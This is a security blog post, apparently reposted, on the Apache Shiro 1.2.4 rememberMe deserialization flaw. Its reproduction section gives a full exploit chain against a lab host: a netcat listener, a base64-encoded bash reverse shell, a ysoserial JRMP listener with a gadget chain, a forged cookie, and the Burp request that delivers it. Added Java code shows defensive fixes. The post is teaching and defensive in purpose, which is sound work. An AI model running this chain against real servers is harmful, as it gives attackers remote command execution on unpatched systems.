Shiro 1.2.4 Deserialization Vulnerability
Contents
- Shiro 1.2.4 deserialization vulnerability
- I. The JRMP protocol
- II. Vulnerability principle
- III. Reproduction steps
- IV. Fix and defense
I. The JRMP protocol
JRMP stands for Java Remote Method Protocol; it is the wire protocol that RMI (Remote Method Invocation) runs on top of.
II. Vulnerability principle
In Apache Shiro 1.2.4 and earlier, the encrypted, serialized user information is stored in a cookie named remember-me. An attacker can use Shiro's default key to forge a user cookie, trigger a Java deserialization vulnerability and thereby execute arbitrary commands on the target machine.
My understanding (not necessarily correct):
The Apache Shiro deserialization vulnerability exists mainly because the user's information is serialized, AES-encrypted and base64-encoded, then stored in the remember-me field of the Cookie. An attacker can craft the parameter in the remember-me field; when it reaches the backend server, the server base64-decodes and AES-decrypts the remember-me field, then deserializes it and connects to a JRMP service. When the JRMP service is reached, it sends a base64-encoded reverse connection to the server, and once the server decodes it the reverse connection is executed automatically. The AES encryption key being fixed is also part of the cause.
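The last step of the server-side chain described above is the dangerous one: once the cookie body is base64-decoded and AES-decrypted, it goes straight into ObjectInputStream, which will instantiate whatever classes the stream names. The following Java example is added here as a defensive illustration; it is not Shiro's own code and not the article's script. It models that final step with a subclass of ObjectInputStream that only resolves classes on an allow-list, so a stream naming any other class is rejected before an object is constructed. The allow-list contents and the sample objects are assumptions made for the demonstration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;

// Added defensive example: allow-list deserialization for an already-decrypted cookie body.
public class RememberMeAllowList {

    // Assumed allow-list: the only types a legitimate rememberMe body is expected to contain.
    // Serializable superclasses (HashMap, HashSet) must be listed too, because the stream
    // carries a class descriptor for each serializable ancestor and resolveClass sees them all.
    private static final Set<String> ALLOWED = Set.of(
            "org.apache.shiro.subject.SimplePrincipalCollection",
            "java.util.LinkedHashMap", "java.util.HashMap",
            "java.util.LinkedHashSet", "java.util.HashSet");

    static final class AllowListObjectInputStream extends ObjectInputStream {
        AllowListObjectInputStream(InputStream in) throws IOException {
            super(in);
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            String name = desc.getName();
            if (!ALLOWED.contains(name)) {
                // Reject before the JVM loads or instantiates the class named in the stream.
                throw new InvalidClassException(name, "class not permitted in rememberMe cookie");
            }
            return super.resolveClass(desc);
        }
    }

    /** Deserializes an already-decrypted cookie body with the allow-list enforced. */
    static Object readCookieBody(byte[] plaintext) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new AllowListObjectInputStream(new ByteArrayInputStream(plaintext))) {
            return in.readObject();
        }
    }

    /** Plays the role of the cookie-writing side; used only to build constructed samples. */
    static byte[] serialize(Object value) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) {
            out.writeObject(value);
        }
        return buf.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a map of the shape a benign principal record might carry.
        Map<String, String> benign = new LinkedHashMap<>();
        benign.put("realm", "iniRealm");
        benign.put("user", "alice");
        System.out.println("benign body -> " + readCookieBody(serialize(benign)));

        // Constructed sample: ArrayList stands in for any class the application never expects.
        byte[] unexpected = serialize(new ArrayList<>(List.of("x")));
        try {
            readCookieBody(unexpected);
            System.out.println("unexpected body accepted (should not happen)");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The point of the allow-list is that the decision is made on the class name in the stream, before any constructor, readObject or finalizer of that class can run, which is where gadget-chain deserialization does its damage. On Java 9 and later the same policy can be expressed with ObjectInputFilter (ObjectInputStream.setObjectInputFilter) instead of overriding resolveClass. An allow-list limits the blast radius of a leaked or guessable key; it does not replace fixing the key itself.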
III. Reproduction steps
1. Listen on port 6666 on the Kali machine (192.168.142.133)
nc -lvp 6666
2. Encode the reverse-connection command
Encoding site: https://ares-x.com/tools/runtime-exec/
bash -i >& /dev/tcp/192.168.142.133/6666 0>&1
After encoding:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
3. Start a JRMP listener with ysoserial (it can run on Windows or on Linux)
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"
4. Use the shiro.py script to AES-encrypt and base64-encode the payload
python shiro.py 192.168.142.1:8888
Output:
rememberMe=kcsXiGTWRTCTQnw3pjWUu0gg0tCiFg+TYpRxFUG5VkeiW5Mikx9fazx/UVsHKg3jYm0wZ0/N7Im4w0pJheg4n0TvApMQsFzcR6+I4uA+Fow1hR1iLMxhLVixyZdUEj5zwBqOXnK+Ju3ikfry+wwqscqtkzjZFe40uI+Fxdynw7bi4sCA6SY48UULNiIdeVRrwvqe7nfA+ZihSolHG4UaTvX+ySSiYzBfqKsN5RJWPbvzUWvSXXdaQE0ch7jtCYxYw+vTcSrEW9yj94KgJPQa6ZqaTbFFqG08obLGxGVJ5v2h+XGHro4wxkg0HiY+gkfgdLEt8gGcLmd3IJSLzlOWnv9KBnYN7vfXpfuZ7/P5tA3VIVapyFjx3qvY4zkSc/Q/VGuUis75k856P3Af3q+HwA==
5. Send the payload with Burp Suite
POST /doLogin HTTP/1.1
Host: 192.168.142.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.142.133:8080
Connection: close
Referer: http://192.168.142.133:8080/login;jsessionid=0B0A2E71C16C929317001BA8542BD94E
Cookie: JSESSIONID=0B0A2E71C16C929317001BA8542BD94E;rememberMe=kcsXiGTWRTCTQnw3pjWUu0gg0tCiFg+TYpRxFUG5VkeiW5Mikx9fazx/UVsHKg3jYm0wZ0/N7Im4w0pJheg4n0TvApMQsFzcR6+I4uA+Fow1hR1iLMxhLVixyZdUEj5zwBqOXnK+Ju3ikfry+wwqscqtkzjZFe40uI+Fxdynw7bi4sCA6SY48UULNiIdeVRrwvqe7nfA+ZihSolHG4UaTvX+ySSiYzBfqKsN5RJWPbvzUWvSXXdaQE0ch7jtCYxYw+vTcSrEW9yj94KgJPQa6ZqaTbFFqG08obLGxGVJ5v2h+XGHro4wxkg0HiY+gkfgdLEt8gGcLmd3IJSLzlOWnv9KBnYN7vfXpfuZ7/P5tA3VIVapyFjx3qvY4zkSc/Q/VGuUis75k856P3Af3q+HwA==
Upgrade-Insecure-Requests: 1
username=1&password=1&rememberme=remember-me
IV. Fix and defense
1. Upgrade Apache Shiro
2. Deploy security products
Please credit the source when reposting. Original link: https://www.uj5u.com/qita/551469.html
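Upgrading removes the fixed key: from Shiro 1.2.5 the rememberMe cipher key is generated at startup instead of being compiled in. Where an immediate upgrade is not possible, the same property can be restored by configuring an application-owned key, which is what the Java example below shows. It is an added example, not the article's code and not a snippet from the Shiro documentation; the environment variable name is an assumption, and any secrets source works as long as every node of the application receives the same bytes.

```java
import java.security.Key;
import java.util.Base64;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.web.mgt.CookieRememberMeManager;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;

// Added example: replace the shared default cipherKey with a per-deployment key.
public class RememberMeKeyConfig {

    // Assumed variable name for the base64-encoded key held in secrets management.
    private static final String KEY_ENV = "SHIRO_REMEMBERME_KEY";

    /** Generates a new 128-bit AES key using Shiro's own cipher service. */
    static byte[] generateCipherKey() {
        Key key = new AesCipherService().generateNewKey();
        return key.getEncoded();
    }

    /** Loads the key from the environment, or generates one when none is configured. */
    static byte[] loadCipherKey() {
        String encoded = System.getenv(KEY_ENV);
        if (encoded == null || encoded.isEmpty()) {
            // A one-off key still beats the default, but it changes on every restart
            // and differs between nodes, so print it once so it can be stored.
            byte[] fresh = generateCipherKey();
            System.err.println("No " + KEY_ENV + " set; generated key (store it): "
                    + Base64.getEncoder().encodeToString(fresh));
            return fresh;
        }
        byte[] key = Base64.getDecoder().decode(encoded);
        if (key.length != 16 && key.length != 24 && key.length != 32) {
            throw new IllegalStateException(KEY_ENV + " must decode to a 128/192/256-bit AES key");
        }
        return key;
    }

    /** Builds a security manager whose rememberMe cookies use the application's own key. */
    static DefaultWebSecurityManager buildSecurityManager(byte[] cipherKey) {
        CookieRememberMeManager rememberMe = new CookieRememberMeManager();
        rememberMe.setCipherKey(cipherKey);   // overrides the compiled-in default key
        DefaultWebSecurityManager securityManager = new DefaultWebSecurityManager();
        securityManager.setRememberMeManager(rememberMe);
        return securityManager;
    }

    public static void main(String[] args) {
        DefaultWebSecurityManager securityManager = buildSecurityManager(loadCipherKey());
        System.out.println("rememberMe manager configured: "
                + securityManager.getRememberMeManager().getClass().getSimpleName());
    }
}
```

With a private key, a cookie produced with the default key fails AES decryption and never reaches ObjectInputStream, which closes the path the article reproduces. Two operational caveats: rotating the key invalidates every existing rememberMe cookie, so users are simply asked to log in again; and the key is now a single secret whose disclosure reopens the same deserialization path, which is why a class allow-list on the decrypted body, and ultimately the upgrade, still matter.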
